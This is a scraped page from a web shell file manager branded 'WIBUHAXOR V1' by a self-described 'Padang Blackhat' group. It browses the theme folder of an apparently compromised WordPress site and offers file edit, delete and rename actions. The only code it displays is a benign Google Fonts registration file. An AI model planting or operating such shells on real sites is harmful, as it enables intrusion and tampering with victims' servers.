-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
public_html
/
wp-content
/
themes
/
consultera
/
inc
/
font
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
.htaccess
0.231KB
Edit File
Delete File
Rename
font.php
0.816KB
Edit File
Delete File
Rename
<?php /*--------------------------------------------------------------------*/ /* Register Google Fonts /*--------------------------------------------------------------------*/ function consultera_fonts_url() { $fonts_url = ''; $font_families = array(); $font_families = array('Poppins:300, 400,500,600,700,800&display=swap'); $query_args = array( 'family' => urlencode( implode( '|', $font_families ) ), 'subset' => urlencode( 'latin,latin-ext' ), ); $fonts_url = add_query_arg( $query_args, '//fonts.googleapis.com/css' ); return $fonts_url; } function consultera_scripts_styles() { wp_enqueue_style( 'consultera-fonts', consultera_fonts_url(), array(), null ); } add_action( 'wp_enqueue_scripts', 'consultera_scripts_styles'); ?>
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat